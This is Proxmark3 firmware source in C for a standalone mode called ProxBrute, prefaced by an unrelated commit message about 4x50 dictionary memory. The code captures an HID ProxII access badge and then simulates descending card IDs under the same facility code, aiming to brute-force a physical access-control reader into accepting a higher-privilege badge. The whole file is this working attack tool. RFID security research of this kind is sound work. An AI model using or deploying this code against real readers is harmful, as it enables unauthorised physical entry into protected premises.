reworked "lf em 4x50 chk" to use dynamic memory for dictionary
1 //-----------------------------------------------------------------------------
2 // Samy Kamkar, 2011, 2012
3 // Brad antoniewicz 2011
4 // Christian Herrmann, 2017
5 //
6 // This code is licensed to you under the terms of the GNU GPL, version 2 or,
7 // at your option, any later version. See the LICENSE.txt file for the text of
8 // the license.
9 //-----------------------------------------------------------------------------
10 // main code for LF aka Proxbrute by Brad antoniewicz
11 //-----------------------------------------------------------------------------
12 #include "standalone.h" // standalone definitions
13 #include "proxmark3_arm.h"
14 #include "appmain.h"
15 #include "fpgaloader.h"
16 #include "util.h"
17 #include "dbprint.h"
18 #include "ticks.h"
19 #include "lfops.h"
void ModInfo(void) {
    // One-line description shown in the standalone-mode listing.
    static const char mode_desc[] = " LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)";
    DbpString(mode_desc);
}
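// State of the record / brute-force loop driven by RunMod.
enum proxbrute_state {
    STATE_READ,   // waiting for a button hold to record a tag
    STATE_BRUTE   // a tag is recorded; next hold sweeps IDs below it
};

// Record one LF HID tag into *high / *low.
// Returns true when a non-zero tag was captured; false when only zeros
// came back (the caller then waits for the next button hold and retries).
static bool proxbrute_record(uint32_t *high, uint32_t *low) {
    LEDsoff();
    LED_A_ON();
    WAIT_BUTTON_RELEASED();

    DbpString("[=] starting recording");

    // Cleared before the watch so a capture that returns without writing
    // is reported as "nothing" rather than as the previously recorded tag
    // (NOTE(review): whether lf_hid_watch always writes both is not visible here).
    *high = 0;
    *low = 0;

    // findone = 1: return after the first decoded tag
    lf_hid_watch(1, high, low);

    Dbprintf("[=] recorded | %x%08x", *high, *low);

    // got nothing. blink and let the caller loop.
    if (*high == 0 && *low == 0) {
        SpinErr(LED_A, 100, 12);
        DbpString("[=] only got zeros, retry recording after click");
        return false;
    }

    SpinErr(LED_A, 250, 2);
    return true;
}

// Simulate every card ID below `low` (facility code `high` kept fixed),
// counting down, for as long as the button stays held and no USB command
// has arrived. There is no feedback from the reader, so the sweep cannot
// tell whether any ID was accepted (see the ProxBrute note below).
static void proxbrute_sweep(uint32_t high, uint32_t low) {
    LED_C_ON(); // Simulate
    WAIT_BUTTON_RELEASED();

    /*
     ProxBrute - brad a. - foundstone

     Following code is a trivial brute forcer once you read a valid tag
     the idea is you get a valid tag, then just try and brute force to
     another priv level. The problem is that it has no idea if the code
     worked or not, so its a crap shoot. One option is to time how long
     it takes to get a valid ID then start from scratch every time.
    */
    DbpString("[=] entering ProxBrute mode");
    Dbprintf("[=] simulating | %08x%08x", high, low);

    // The ID counter is deliberately 16 bits (as in the original code):
    // `low - 1` is truncated, so a recorded low above 0xFFFF wraps into
    // the 16-bit range instead of sweeping the full 32-bit space.
    for (uint16_t i = (uint16_t)(low - 1); i > 0; i--) {

        // exit from the sweep when a usbcommand arrives
        if (data_available()) break;

        // releasing the button aborts the sweep
        if (BUTTON_HELD(280) != BUTTON_HOLD) break;

        Dbprintf("[=] trying Facility = %08x ID %08x", high, i);

        // high, i, ledcontrol, timelimit 20000
        CmdHIDsimTAGEx(0, high, i, 0, false, 20000);

        SpinDelay(100);
    }

    SpinErr((LED_A | LED_C), 250, 2);
    LEDsoff();
}

// samy's sniff and repeat routine for LF
//
// Main loop of the standalone mode: each button hold alternates between
// recording a tag (STATE_READ) and sweeping IDs below it (STATE_BRUTE).
// Returns when a USB command is received.
void RunMod(void) {
    StandAloneMode();
    Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
    FpgaDownloadAndGo(FPGA_BITSTREAM_LF);

    // Initialised so the zero check in proxbrute_record never reads
    // indeterminate values on the first pass.
    uint32_t high = 0, low = 0;

    enum proxbrute_state state = STATE_READ;

    for (;;) {

        WDT_HIT();

        // exit from SamyRun, send a usbcommand.
        if (data_available()) break;

        // Only a button hold of at least 280 ms advances the state machine;
        // a short press or no press just keeps polling.
        if (BUTTON_HELD(280) != BUTTON_HOLD)
            continue;

        switch (state) {
            case STATE_READ:
                // stay in STATE_READ until a non-zero tag was captured
                if (proxbrute_record(&high, &low))
                    state = STATE_BRUTE;
                break;

            case STATE_BRUTE:
                proxbrute_sweep(high, low);
                state = STATE_READ;
                break;

            default:
                // unreachable with the two states above; reset defensively
                state = STATE_READ;
                break;
        }
    }

    SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5);
    DbpString("[=] You can take the shell back :) ...");
    LEDsoff();
}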